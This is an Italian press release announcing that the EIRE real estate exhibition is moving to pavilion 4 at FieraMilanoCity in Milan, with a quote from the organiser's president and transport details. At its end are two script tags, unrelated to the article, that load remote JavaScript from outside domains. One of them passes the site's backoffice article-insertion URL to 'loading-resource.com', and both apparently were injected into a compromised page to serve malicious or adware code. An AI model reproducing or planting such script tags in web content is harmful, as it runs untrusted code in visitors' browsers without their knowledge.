La decisione della società organizzatrice Ge.Fi. Gestione Fiere SpA è frutto di numerose sollecitazioni pervenute negli ultimi anni da parte di visitatori ed espositori della manifestazione, che dal 2005 al 2012 si era sempre tenuta nel polo fieristico di Rho-Pero.
“EIRE è il luogo di riferimento della community del Real Estate e, in quanto tale, deve mettere gli operatori in condizione di lavorare in un contesto professionale, comodo e funzionale alle loro esigenze – ha spiegato Antonio Intiglietta, Presidente Ge.Fi. SpA -. A FieraMilanoCity, nel cuore della città di Milano, realizzeremo spazi espositivi e di incontro, tesi ad accrescere la conoscenza e la valutazione delle opportunità di sviluppo immobiliare nel Paese, nonché a facilitare l’aggiornamento e la formazione sul tema strategico della valorizzazione dei patrimoni”.
L’Exhibition Meeting del Real Estate italiano troverà così una sede più propria, presso il padiglione 4 del Portello, dotato dei servizi e delle soluzioni logistiche più avanzate. Il principale collegamento con la sede espositiva è garantito dalla metropolitana (linea M1, fermata urbana Lotto-FieraMilanoCity), mentre tra i vantaggi per chi sposta con mezzi privati vi è il parcheggio connesso direttamente al padiglione 4.
Ulteriori informazioni sul sitowww.eire.mi.it
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>